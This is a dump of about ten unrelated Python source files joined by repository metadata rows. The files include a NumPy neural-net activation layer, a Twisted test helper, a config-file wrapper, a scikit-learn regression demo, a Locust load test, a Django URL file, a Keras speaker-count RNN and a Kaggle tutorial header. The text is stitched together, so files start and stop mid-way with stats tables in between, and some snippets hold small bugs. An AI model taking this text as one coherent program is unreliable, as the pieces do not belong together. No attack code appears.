>>>
>>> # Visualizations
>>>
>>> fig, (ax1, ax2, ax3) = plt.subplots(nrows=1, ncols=3, figsize=(10, 5))
>>> fig.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.15)
>>>
>>> fig.suptitle('Activation Layer : {}'.format(activation_func.name))
>>>
>>> ax1.imshow(float_2_img(inpt[0]))
>>> ax1.set_title('Original image')
>>> ax1.axis('off')
>>>
>>> ax2.imshow(float_2_img(forward_out[0]))
>>> ax2.set_title("Forward")
>>> ax2.axis("off")
>>>
>>> ax3.imshow(float_2_img(delta[0]))
>>> ax3.set_title('Backward')
>>> ax3.axis('off')
>>>
>>> fig.tight_layout()
>>> plt.show()
.. image:: ../../../NumPyNet/images/activation_relu.png
References
----------
- TODO
'''
def __init__(self, input_shape=None, activation=Activations, **kwargs):
activation = _check_activation(self, activation)
self.activation = activation.activate
self.gradient = activation.gradient
super(Activation_layer, self).__init__(input_shape=input_shape)
def __str__(self):
'''
Printer
'''
batch, out_width, out_height, out_channels = self.out_shape
return 'activ {0:>4d} x{1:>4d} x{2:>4d} x{3:>4d} -> {0:>4d} x{1:>4d} x{2:>4d} x{3:>4d}'.format(
batch, out_width, out_height, out_channels)
def forward(self, inpt, copy=True):
'''
Forward of the activation layer, apply the selected activation function to
the input.
Parameters
----------
inpt: array-like
Input array to activate.
copy: bool (default=True)
If True make a copy of the input before applying the activation.
Returns
-------
self
'''
self._check_dims(shape=self.out_shape, arr=inpt, func='Forward')
self.output = self.activation(inpt, copy=copy)
self.delta = np.zeros(shape=self.out_shape, dtype=float)
return self
def backward(self, delta, copy=False):
'''
Compute the backward of the activation layer
Parameters
----------
delta : array-like
Global error to be backpropagated.
Returns
-------
self
'''
check_is_fitted(self, 'delta')
self._check_dims(shape=self.out_shape, arr=delta, func='Backward')
self.delta *= self.gradient(self.output, copy=copy)
delta[:] = self.delta
return self
if __name__ == '__main__':
import os
import pylab as plt
from PIL import Image
from NumPyNet import activations
activation_func = activations.Hardtan()
img_2_float = lambda im : ((im - im.min()) * (1./(im.max() - im.min()) * 1.)).astype(float)
float_2_img = lambda im : ((im - im.min()) * (1./(im.max() - im.min()) * 255.)).astype(np.uint8)
filename = os.path.join(os.path.dirname(__file__), '..', '..', 'data', 'dog.jpg')
inpt = np.asarray(Image.open(filename), dtype=float)
inpt.setflags(write=1)
inpt = img_2_float(inpt)
# Relu activation constrain
inpt = inpt * 2 - 1
# add batch = 1
inpt = np.expand_dims(inpt, axis=0)
layer = Activation_layer(input_shape=inpt.shape, activation=activation_func)
# FORWARD
layer.forward(inpt)
forward_out = layer.output
print(layer)
# BACKWARD
layer.delta = np.ones(shape=inpt.shape, dtype=float)
delta = np.zeros(shape=inpt.shape, dtype=float)
layer.backward(delta, copy=True)
# Visualizations
fig, (ax1, ax2, ax3) = plt.subplots(nrows=1, ncols=3, figsize=(10, 5))
fig.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.15)
fig.suptitle('Activation Layer\nfunction : {}'.format(activation_func.name))
ax1.imshow(float_2_img(inpt[0]))
ax1.set_title('Original image')
ax1.axis('off')
ax2.imshow(float_2_img(forward_out[0]))
ax2.set_title("Forward")
ax2.axis("off")
ax3.imshow(float_2_img(delta[0]))
ax3.set_title('Backward')
ax3.axis('off')
fig.tight_layout()
plt.show()
| 25.840909 | 119 | 0.63131 | 3,730 | 0.656113 | 0 | 0 | 0 | 0 | 0 | 0 | 3,099 | 0.545119 |
339039daaf7ffa710ba3dbd6f69316cd722f2b38 | 843 | py | Python | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | 39 | 2015-04-09T12:55:25.000Z | 2022-01-09T17:56:39.000Z | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | null | null | null | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | 13 | 2015-12-17T21:56:26.000Z | 2019-06-01T18:22:02.000Z | import unittest
from twisted.internet import reactor, task
class ReactorTestCase(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(ReactorTestCase, self).__init__(*args, **kwargs)
self.done = False
def timeOutAfter(self, seconds):
f = reactor.callLater(seconds, self.timedOut)
f.start(seconds)
def timedOut(self):
self.done = True
self.assertTrue(False, "test timed out!")
print "Test Timed Out!"
if reactor.running:
reactor.stop()
def reactorAssert(self, success, msg):
if not self.done:
self.assertTrue(success, msg)
def reactorTestComplete(self):
self.done = True
self.assertTrue(True, "test complete!")
print "Test Complete!"
if reactor.running:
reactor.stop()
| 28.1 | 62 | 0.619217 | 782 | 0.927639 | 0 | 0 | 0 | 0 | 0 | 0 | 66 | 0.078292 |
3390fdfb284aecfe0fd47351543fe7cd80e19246 | 1,068 | py | Python | old/accurate_landing.py | domnantas/landing-system | 408f352ce56d83ec63882e0aee370df5f5d683ad | [
"MIT"
] | 1 | 2021-09-15T08:06:03.000Z | 2021-09-15T08:06:03.000Z | old/accurate_landing.py | domnantas/landing-system | 408f352ce56d83ec63882e0aee370df5f5d683ad | [
"MIT"
] | null | null | null | old/accurate_landing.py | domnantas/landing-system | 408f352ce56d83ec63882e0aee370df5f5d683ad | [
"MIT"
] | null | null | null | from oled import TrackerOled
from color_tracker import ColorTracker
import cv2
from threading import Thread
tracker_oled = TrackerOled()
color_tracker = ColorTracker()
def write_fps():
tracker_oled.writeTextCenter("FPS: {:.2f}".format(color_tracker.fps.fps()))
tracker_oled.writeTextCenter("READY")
while True:
color_tracker.processFrame()
# t = Thread(target=write_fps, args=(), daemon=True)
# t.start()
(frame_height, frame_width, frame_channels) = color_tracker.frame.shape
if color_tracker.center is not None:
(point_x, point_y) = color_tracker.center
draw_x = int(round(point_x * tracker_oled.oled.width / frame_width))
draw_y = int(round(point_y * tracker_oled.oled.height / frame_height))
tracker_oled.drawPoint(draw_x, draw_y)
# else:
# tracker_oled.writeTextCenter("NOT FOUND")
key = cv2.waitKey(1) & 0xFF
# if the 'q' key is pressed, stop the loop
if key == ord("q"):
color_tracker.release()
out.release()
tracker_oled.clearDisplay()
break
| 30.514286 | 79 | 0.690075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 182 | 0.170412 |
3393b84012cd8093cec6722d84c146ceb9736287 | 6,692 | py | Python | lightconfig/lightconfig.py | daassh/LightConfig | e7d962bafae47e635b8a14abe8f6f98cb3ea16a9 | [
"MIT"
] | 2 | 2018-07-24T02:16:41.000Z | 2018-08-06T06:52:15.000Z | lightconfig/lightconfig.py | daassh/LightConfig | e7d962bafae47e635b8a14abe8f6f98cb3ea16a9 | [
"MIT"
] | null | null | null | lightconfig/lightconfig.py | daassh/LightConfig | e7d962bafae47e635b8a14abe8f6f98cb3ea16a9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
# get a easy way to edit config file
"""
>>> from lightconfig import LightConfig
>>> cfg = LightConfig("config.ini")
>>> cfg.section1.option1 = "value1"
>>> print(cfg.section1.option1)
value1
>>> "section1" in cfg
True
>>> "option1" in cfg.section1
True
"""
import os
import codecs
import locale
try:
from ConfigParser import RawConfigParser as ConfigParser
except ImportError:
from configparser import RawConfigParser as ConfigParser
class ConfigParserOptionCaseSensitive(ConfigParser):
"""
add case sensitve to ConfigParser
"""
def __init__(self, defaults=None):
ConfigParser.__init__(self, defaults)
def optionxform(self, option_str):
return option_str
class LightConfig(object):
def __init__(self, config_path, try_encoding={'utf-8', 'utf-8-sig', locale.getpreferredencoding().lower()}, try_convert_digit = False):
self.__dict__['_config_path'] = config_path
self.__dict__['_try_encoding'] = try_encoding if isinstance(try_encoding, (list, tuple, set)) else [try_encoding]
self.__dict__['_try_convert_digit'] = try_convert_digit
self.__dict__['_config'] = ConfigParserOptionCaseSensitive()
if not os.path.exists(config_path):
dir_path = os.path.dirname(os.path.abspath(config_path))
if not os.path.exists(dir_path):
os.makedirs(dir_path)
open(config_path, 'a').close()
LightConfig._read(self)
self.__dict__['_cached_stamp'] = LightConfig._stamp(self)
def __str__(self):
return str(LightConfig._as_dict(self))
def __repr__(self):
return repr(LightConfig._as_dict(self))
def __iter__(self):
return iter(LightConfig._as_dict(self).items())
def __getattribute__(self, item):
if item in ('keys', '__dict__'):
return super(LightConfig, self).__getattribute__(item)
else:
return LightConfig.__getattr__(self, item)
def __getattr__(self, item):
return LightConfig.Section(self, item, self.__dict__['_try_convert_digit'])
__getitem__ = __getattr__
def __setattr__(self, name, value):
try:
value = dict(value)
except:
raise ValueError('"{}" is not dictable'.format(value))
else:
LightConfig.__dict__['__delattr__'](self, name)
section = LightConfig.Section(self, name, self.__dict__['_try_convert_digit'])
for k, v in value.items():
LightConfig.Section.__setattr__(section, k, v)
__setitem__ = __setattr__
def __delattr__(self, item):
if item in self:
self.__dict__['_config'].remove_section(item)
LightConfig._save(self)
__delitem__ = __delattr__
def __contains__(self, item):
return self.__dict__['_config'].has_section(item)
def _as_dict(self):
res = {}
for section in self.keys():
res[section] = self[section]
return res
def keys(self):
return self.__dict__['_config'].sections()
def _read(self):
for encoding in self.__dict__['_try_encoding']:
fp = codecs.open(self.__dict__['_config_path'], encoding=encoding)
try:
if 'read_file' in dir(self.__dict__['_config']):
self.__dict__['_config'].read_file(fp)
else:
self.__dict__['_config'].readfp(fp)
except:
err = True
else:
err = False
self.__dict__['_encoding'] = encoding
break
if err:
raise UnicodeError("\"{}\" codec can't decode this config file".format(', '.join(self.__dict__['_try_encoding'])))
def _save(self):
self.__dict__['_config'].write(codecs.open(self.__dict__['_config_path'], "w", encoding=self.__dict__['_encoding']))
self.__dict__['_cached_stamp'] = LightConfig._stamp(self)
def _stamp(self):
return os.stat(self.__dict__['_config_path']).st_mtime
class Section(object):
def __init__(self, conf, section, try_convert_digit):
self.__dict__['_section'] = section
self.__dict__['_conf'] = conf
self.__dict__['_try_convert_digit'] = try_convert_digit
def __str__(self):
return str(LightConfig.Section._as_dict(self))
def __repr__(self):
return repr(LightConfig.Section._as_dict(self))
def __iter__(self):
return iter(LightConfig.Section._as_dict(self).items())
def __getattribute__(self, item):
if item in ('keys', '__dict__'):
return super(LightConfig.Section, self).__getattribute__(item)
else:
return LightConfig.Section.__getattr__(self, item)
def __getattr__(self, option):
current_stamp = LightConfig._stamp(self.__dict__['_conf'])
if current_stamp != self.__dict__['_conf'].__dict__['_cached_stamp']:
LightConfig._read(self.__dict__['_conf'])
self.__dict__['_conf'].__dict__['_cached_stamp'] = current_stamp
value = self.__dict__['_conf'].__dict__['_config'].get(self.__dict__['_section'], option)
if self.__dict__['_try_convert_digit']:
try:
value = eval(value)
except:
pass
return value
__getitem__ = __getattr__
def __setattr__(self, key, value):
if not self.__dict__['_section'] in self.__dict__['_conf']:
self.__dict__['_conf'].__dict__['_config'].add_section(self.__dict__['_section'])
self.__dict__['_conf'].__dict__['_config'].set(self.__dict__['_section'], key, str(value))
LightConfig._save(self.__dict__['_conf'])
__setitem__ = __setattr__
def __delattr__(self, item):
if item in self:
self.__dict__['_conf'].__dict__['_config'].remove_option(self.__dict__['_section'], item)
LightConfig._save(self.__dict__['_conf'])
__delitem__ = __delattr__
def __contains__(self, item):
return self.__dict__['_conf'].__dict__['_config'].has_option(self.__dict__['_section'], item)
def _as_dict(self):
return dict(self.__dict__['_conf'].__dict__['_config'].items(self.__dict__['_section']))
def keys(self):
return self.__dict__['_conf'].__dict__['_config'].options(self.__dict__['_section'])
| 36.568306 | 139 | 0.609534 | 6,206 | 0.927376 | 0 | 0 | 0 | 0 | 0 | 0 | 1,103 | 0.164824 |
3393bcf3b27570f5d59ffe21a0c2d9ebb337faa5 | 2,414 | py | Python | assets/scikit-learn_linear_regression.py | tbienias/blog | 78babd9cab487a4f8746a0918d363985ea8cd8a8 | [
"MIT"
] | 6 | 2020-12-10T00:39:38.000Z | 2022-02-10T20:16:04.000Z | assets/scikit-learn_linear_regression.py | tbienias/blog | 78babd9cab487a4f8746a0918d363985ea8cd8a8 | [
"MIT"
] | null | null | null | assets/scikit-learn_linear_regression.py | tbienias/blog | 78babd9cab487a4f8746a0918d363985ea8cd8a8 | [
"MIT"
] | null | null | null | """
This script shows the usage of scikit-learns linear regression functionality.
"""
# %% [markdown]
# # Linear Regression using Scikit-Learn #
# %% [markdown]
# ## Ice Cream Dataset ##
# | Temperature C° | Ice Cream Sales |
# |:--------------:|:---------------:|
# | 15 | 34 |
# | 24 | 587 |
# | 34 | 1200 |
# | 31 | 1080 |
# | 29 | 989 |
# | 26 | 734 |
# | 17 | 80 |
# | 11 | 1 |
# | 23 | 523 |
# | 25 | 651 |
# %% [markdown]
# ### Dependencies ###
# Install Numpy for number crunching and Matplotlib for plotting graphs:
# ```bash
# pip install sklearn
# ```
# %% [markdown]
# ### Imports ###
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
# %% [markdown]
# ### Ice Cream Dataset as Numpy Array ###
data = np.array([[15, 34],
[24, 587],
[34, 1200],
[31, 1080],
[29, 989],
[26, 734],
[17, 80],
[11, 1],
[23, 523],
[25, 651],
[0, 0],
[2, 0],
[12, 5]])
# %% [markdown]
# ### Plotting the Dataset ###
x_values, y_values = data.T
plt.style.use('ggplot')
plt.scatter(x_values, y_values)
plt.show()
# %% [markdown]
# ### Prepare Train and Test Data ###
x_train, x_test, y_train, y_test = train_test_split(
x_values, y_values, test_size=1/3)
x_train = x_train.reshape(-1, 1)
x_test = x_test.reshape(-1, 1)
y_train = y_train.reshape(-1, 1)
y_test = y_test.reshape(-1, 1)
# %% [markdown]
# ### Train model ###
regression = linear_model.LinearRegression()
regression.fit(x_train, y_train)
# %% [markdown]
# ### Predict ###
y_prediction = regression.predict(x_test)
# %% [markdown]
# ### Plot Predicted Results ###
plt.scatter(x_test, y_test)
plt.plot(x_test, y_prediction, color='blue')
plt.show()
# %% [markdown]
# ### Print Metrics ###
print('Coefficient: \n', regression.coef_)
print('Intercept: \n', regression.intercept_)
print('Mean Squared Error: %.2f' % mean_squared_error(y_test, y_prediction))
| 22.146789 | 77 | 0.511599 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,194 | 0.49441 |
339506ce1e95c27d7ca74c94295129c3b605e640 | 9,195 | py | Python | RNN.py | AuckeBos/Speaker-count-estimation-with-single-speakers | e56f53c0a49e0a2ed446e55ec8764182f67fd236 | [
"MIT"
] | null | null | null | RNN.py | AuckeBos/Speaker-count-estimation-with-single-speakers | e56f53c0a49e0a2ed446e55ec8764182f67fd236 | [
"MIT"
] | null | null | null | RNN.py | AuckeBos/Speaker-count-estimation-with-single-speakers | e56f53c0a49e0a2ed446e55ec8764182f67fd236 | [
"MIT"
] | null | null | null | from datetime import datetime
import numpy as np
import tensorflow as tf
import tensorflow.keras.backend as K
import tensorflow_probability as tfp
from sklearn.metrics import mean_absolute_error
from tensorflow.python.keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint
from tensorflow.python.keras.optimizer_v2.adam import Adam
from TestSetGenerator import TestSetGenerator
from TimingCallback import TimingCallback
from TrainSetGenerator import TrainSetGenerator
from helpers import write_log
tfd = tfp.distributions
from tensorflow.keras.layers import Dense, InputLayer, Bidirectional, LSTM, Masking
from tensorflow.keras.models import Sequential
from scipy.stats import poisson
import matplotlib.pyplot as plt
class RNN:
"""
Recurrent neural network to train speaker count estimation with
"""
# Training configuration
batch_size = 128
num_epochs = 80
tensorboard_log = f'./tensorboard/{datetime.now().strftime("%m-%d %H:%M")}/'
# Training callbacks
callbacks: []
# If is set, save model to the filename after training
__save_to_file: str = None
# The trained network
__net = None
# To reproduce
random_state = 1337
# Set num_files_to_merge on the train/validation generators to this value * len(set). We will re-use each file this number of times
use_train_files_times = 5
use_validation_files_times = 2
def __init__(self):
"""
Set callbacks on init
"""
tensorboard = tf.keras.callbacks.TensorBoard(log_dir=self.tensorboard_log)
early_stopping = EarlyStopping(patience=15, verbose=1)
reduce_lr_on_plateau = ReduceLROnPlateau(factor=.4, patience=7, verbose=1)
timing = TimingCallback()
self.callbacks = [tensorboard, early_stopping, reduce_lr_on_plateau, timing]
def load_from_file(self, file):
"""
Load the network from filesystem
:param file: The file path
"""
self.__net = tf.keras.models.load_model(file)
def get_net(self, input_shape: tuple):
"""
Get the network. We use a BiLSTM as described by Stöter et al.
:param input_shape the input shape: [batch_size, time_steps, n_features]
:return: The net
"""
net = Sequential()
net.add(InputLayer(input_shape=input_shape))
# Mask the input
net.add(Masking())
# Add BiLSTM layers
net.add(Bidirectional(LSTM(30, activation='tanh', return_sequences=True, dropout=0.5)))
net.add(Bidirectional(LSTM(20, activation='tanh', return_sequences=True, dropout=0.5)))
net.add(Bidirectional(LSTM(40, activation='tanh', return_sequences=False, dropout=0.5)))
net.add(Dense(20, activation='relu'))
# The network predicts scale parameter \lambda for the poisson distribution
net.add(Dense(1, activation='exponential'))
return net
def save_to_file(self, file):
"""
Set the filename to save our best performing model to
Also add callback to save the best model
:param file:
"""
self.__save_to_file = file
self.callbacks.append(ModelCheckpoint(file, save_best_only=True))
@staticmethod
def poisson(y_true, y_hat):
"""
[Deprecated] - we se keras.losses.Poisson() instead
Since we are predicting a Poisson distribution, our loss function is the poisson loss
:param y_true: Number of speakers
:param y_hat: Lambda for poisson
:return:
"""
theta = tf.cast(y_hat, tf.float32)
y = tf.cast(y_true, tf.float32)
loss = K.mean(theta - y * K.log(theta + K.epsilon()))
return loss
def compile_net(self, input_shape: tuple):
"""
Get the network and compile and save it
:param input_shape The input shape
:return:
"""
net = self.get_net(input_shape)
optimizer = Adam(learning_rate=.001)
net.compile(loss=tf.keras.losses.Poisson(), optimizer=optimizer, metrics=[tf.keras.metrics.MeanAbsoluteError()])
self.__net = net
return self.__net
def __get_train_data(self, files: np.ndarray, min_speakers: int, max_speakers: int, feature_type: str):
"""
Get train generator and validation set
- We create a set for validation instead of a generator, such that we validate on the same set each time
- This also speeds up validation during the training loop drastically, since we only preprocess the validation set once
:param files: All files, will be split .8/0.2 for train/val
:param min_speakers: The min number of speakers to generate files for
:param max_speakers: The max number of speakers to generate files for
:param feature_type: The feature type
:return: train_generator, (val_x, val_y)
"""
# Split files into trai nval
np.random.shuffle(files)
split_index = int(len(files) * .8)
train_files = files[:split_index]
validation_files = files[split_index:]
# Train generator
train_generator = TrainSetGenerator(train_files, self.batch_size, feature_type)
train_generator.set_limits(min_speakers, max_speakers)
train_generator.set_num_files_to_merge(self.use_train_files_times * len(train_files))
# Validation generator
validation_generator = TrainSetGenerator(validation_files, self.batch_size, feature_type)
validation_generator.set_limits(min_speakers, max_speakers)
# No augmentation on the validation set
validation_generator.augment = False
validation_generator.set_num_files_to_merge(self.use_validation_files_times * len(validation_files))
# Generate a full set
validation_set = list(validation_generator.__iter__())[0]
val_x, val_y = validation_set[0], validation_set[1]
return train_generator, (val_x, val_y)
def train(self, files: np.ndarray, min_speakers: int, max_speakers: int, feature_type: str):
"""
Train the network, eg
- Create data generators
- Train with Adam, Poisson loss, MeanAbsoluteError metric.
- Visualize using Tensorboard
:param files: All files
:param min_speakers The min number of speakers to generate files for
:param max_speakers The max number of speakers to generate files for
:param feature_type: Feature type to use
"""
train_generator, (val_x, val_y) = self.__get_train_data(files, min_speakers, max_speakers, feature_type)
net = self.compile_net(train_generator.feature_shape)
write_log('Training model')
history = net.fit(
train_generator,
validation_data=(val_x, val_y),
epochs=self.num_epochs,
callbacks=self.callbacks,
verbose=1,
)
write_log('Model trained')
return net, history
def test(self, X: np.ndarray, Y: np.ndarray, feature_type: str, plot_result=False):
"""
Test the network:
- Compute the MAE for each count in Y
- Compute MAE where y in [1, 10]
- Compute MAE where y in [1, 20]
- Compute the MAE over all labels
:param X: The test data set (list of files)
:param Y: The labels
:param feature_type: Feature type to use
:return MAE
"""
if self.__net is None:
write_log('Cannot test the network, as it is not initialized. Please train your model, or load it from filesystem', True, True)
write_log('Testing network')
generator = TestSetGenerator(X, Y, self.batch_size, feature_type)
Y_hat = self.__net.predict(generator)
# Convert predictions to int: take median of poisson distribution
predictions = np.array([int(poisson(y_hat[0]).median()) for y_hat in Y_hat])
errors = {}
for speaker_count in range(min(Y), max(Y) + 1):
indices_with_count = np.argwhere(Y == speaker_count)
y_current = Y[indices_with_count]
predictions_current = predictions[indices_with_count]
error = mean_absolute_error(y_current, predictions_current)
errors[speaker_count] = error
for max_count in [10, 20]:
indices = np.argwhere(np.logical_and(Y >= 1, Y <= max_count))
errors[f'1_to_{max_count}'] = mean_absolute_error(Y[indices], predictions[indices])
errors['mean'] = mean_absolute_error(Y, predictions)
if plot_result:
self.__plot_test_results(errors)
return errors
def __plot_test_results(self, errors):
"""
Create plot of results of self.test()
:param errors: The errors computed in test()
"""
x, y = [], []
for i in range(1, 21):
if i in errors:
x.append(i)
y.append(errors[i])
plt.plot(x, y)
plt.plot(errors['1_to_10'], 'o')
plt.title("Error per speaker count")
plt.ylabel('MAE')
plt.xlabel('Max number of speakers')
plt.ylim(0, 10)
plt.show()
| 39.12766 | 139 | 0.657423 | 8,455 | 0.919421 | 0 | 0 | 488 | 0.053067 | 0 | 0 | 3,371 | 0.366572 |
3397953b644d0f59b96f9efd7c056d0243abb45a | 380 | py | Python | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | from locust import HttpLocust, TaskSet, task
class WebsiteTasks(TaskSet):
@task
def bcrypt(self):
headers = { "Content-type": "application/json" }
payload = '{"message":"hello world"}'
self.client.post("/SHOUTCLOUD", payload, headers = headers)
class WebsiteUser(HttpLocust):
task_set = WebsiteTasks
min_wait = 1
max_wait = 1
| 27.142857 | 67 | 0.642105 | 323 | 0.85 | 0 | 0 | 198 | 0.521053 | 0 | 0 | 72 | 0.189474 |
3398cb226db154c17c5156d32cace490ac81678b | 198 | py | Python | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | colors = ['black', 'white']
sizes = ['S', 'M', 'L']
tshirts = [
(color, size)
for color in colors
for size in sizes
]
print(f"Cartesian products from {colors} and {sizes}: {tshirts}")
| 18 | 65 | 0.59596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 81 | 0.409091 |
3399587139e4c6f0b9e4a5bc16f77ab6a41e223b | 807 | py | Python | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | 1 | 2019-01-17T21:03:51.000Z | 2019-01-17T21:03:51.000Z | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | # create this file
# rerouting all requests that have ‘api’ in the url to the <code>apps.core.urls
from django.conf.urls import url
from django.urls import path
from rest_framework import routers
from base.src import views
from base.src.views import InitViewSet
#from base.src.views import UploadFileForm
#upload stuff
from django.conf import settings
from django.conf.urls.static import static
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'groups', views.GroupViewSet)
#router.register(r'titles', TitlesViewSet, base_name='titles')
urlpatterns = [
path(r'pawsc', InitViewSet.as_view()),
path(r'pawsc/upload', views.simple_upload, name='simple_upload'),
path(r'pawsc/home', views.home, name='home')
]
urlpatterns += router.urls
| 26.9 | 79 | 0.759603 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 292 | 0.360049 |
33998c2c6881fb81dfbebc65e0a2eb0c23324496 | 2,456 | py | Python | res/test_Rainbow_pen.py | nomissbowling/gcc_Springhead | 5a03cb61e13c61143e394e86d57016d28c79b051 | [
"MIT"
] | null | null | null | res/test_Rainbow_pen.py | nomissbowling/gcc_Springhead | 5a03cb61e13c61143e394e86d57016d28c79b051 | [
"MIT"
] | null | null | null | res/test_Rainbow_pen.py | nomissbowling/gcc_Springhead | 5a03cb61e13c61143e394e86d57016d28c79b051 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
'''test_Rainbow_pen
'''
import sys, os
import numpy as np
from matplotlib import pyplot as plt
from PIL import Image
FN_OUT = 'rainbow_pen_320x240.png'
def mk_col(w, h, x, y):
a = 255
i = int(7 * y / h)
if i == 0: c, u, v = (192, 0, 0), (32, 0, 0), (0, 32, 0) # R
elif i == 1: c, u, v = (192, 96, 0), (0, -32, 0), (0, 32, 0) # O-
elif i == 2: c, u, v = (192, 192, 0), (0, -32, 0), (-32, 0, 0) # Y
elif i == 3: c, u, v = (0, 192, 0), (64, 0, 0), (0, 0, 64) # G
elif i == 4: c, u, v = (0, 192, 192), (0, 0, -64), (0, -64, 0) # C
elif i == 5: c, u, v = (0, 0, 192), (0, 64, 0), (32, 0, 0) # B
elif i == 6: c, u, v = (96, 0, 192), (-32, 0, 0), (32, 0, 0) # M-
return (i, a, c, u, v)
def mk_dum(w, h, x, y):
# return (64, 64, 64, 192)
i, a, (r, g, b), u, v = mk_col(w, h, x, y)
return (r, g, b, a)
def mk_rainbow(w, h, x, y):
# return (x % 256, y % 256, 128, 255)
i, a, (r, g, b), u, v = mk_col(w, h, x, y)
d = h / 7.0
z = int(y - i * d)
e = d / 3.0
f = 1 if z < e else (-1 if z > 2*e else 0)
rgb = np.array((r, g, b))
if f > 0: rgb += np.array(u)
if f < 0: rgb += np.array(v)
r, g, b = rgb
if x < w / 4:
j, k = 2.0 * d * x / w, d / 2.0
t = z + j < k or z - j > k
if x < w / 36 or t: return (255, 255, 255, 0) # transparent
if x < w / 12: return (r, g, b, a)
else: return (224, 128, 0, 255) # light brown
return (r, g, b, a)
def rainbow_pen(w, h):
fig = plt.figure(figsize=(6, 4), dpi=96)
dm = np.ndarray((h, w, 4), dtype=np.uint8)
for y in range(h):
for x in range(w):
dm[y][x] = mk_dum(w, h, x, y)
dum = Image.fromarray(dm[::-1,:,:], 'RGBA')
im = np.ndarray((h, w, 4), dtype=np.uint8)
for y in range(h):
for x in range(w):
im[y][x] = mk_rainbow(w, h, x, y)
img = Image.fromarray(im[::-1,:,:], 'RGBA')
Image.fromarray(im, 'RGBA').save(FN_OUT, 'PNG')
ax = fig.add_subplot(231)
ax.imshow(img)
ax = fig.add_subplot(232)
ax.imshow(img.convert('L'), cmap='gray', vmin=0, vmax=255)
ax = fig.add_subplot(233)
ax.imshow(img.convert('L')) # auto heatmap
ax = fig.add_subplot(234)
ax.imshow(img.convert('YCbCr')) # ok ?
ax = fig.add_subplot(235)
ax.imshow(dum) # img.convert('LAB')) # not supported on PIL <= py 2.5 ?
ax = fig.add_subplot(236)
ax.imshow(dum) # img.convert('HSV')) # not supported on PIL <= py 2.5 ?
plt.show()
if __name__ == '__main__':
rainbow_pen(320, 240)
| 29.590361 | 73 | 0.513844 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 390 | 0.158795 |
3399c4cddcb4d17b9d9aef1da6a020e45290b8d3 | 15,780 | py | Python | kaggle_tutorial_mod.py | DistrictDataLabs/02-seefish | e39189b37f0e925a2c7e9c34be608cbd8243733e | [
"Apache-2.0"
] | null | null | null | kaggle_tutorial_mod.py | DistrictDataLabs/02-seefish | e39189b37f0e925a2c7e9c34be608cbd8243733e | [
"Apache-2.0"
] | null | null | null | kaggle_tutorial_mod.py | DistrictDataLabs/02-seefish | e39189b37f0e925a2c7e9c34be608cbd8243733e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 16 17:31:42 2015
This is adapted from the kaggle tutorial for the National Data Science Bowl at
https://www.kaggle.com/c/datasciencebowl/details/tutorial
Any code section lifted from the tutorial will start with # In tutorial [n].
My adaption will start with # Adapted
2/21/2015: I skipped over all the buildup stuff and just used the functions
they summarized it in. Works fine.
DONE: 1. Create a file with all that other stuff removed.
DONE: 2. Then adapt the file references back to what Chris simplified it to and
make sure it runs.
3. Write/adapt the code to build a submission
4. Figure out how this fits with CNNs.
@author: kperez-lopez
"""
# In tutorial [1]:
from skimage.io import imread
from skimage.transform import resize
from sklearn.ensemble import RandomForestClassifier as RF
import glob
import os
from sklearn import cross_validation
from sklearn.cross_validation import StratifiedKFold as KFold
from sklearn.metrics import classification_report
from matplotlib import pyplot as plt
from matplotlib import colors
from pylab import cm
from skimage import segmentation
from skimage.morphology import watershed
from skimage import measure
from skimage import morphology
import numpy as np
import pandas as pd
from scipy import ndimage
from skimage.feature import peak_local_max
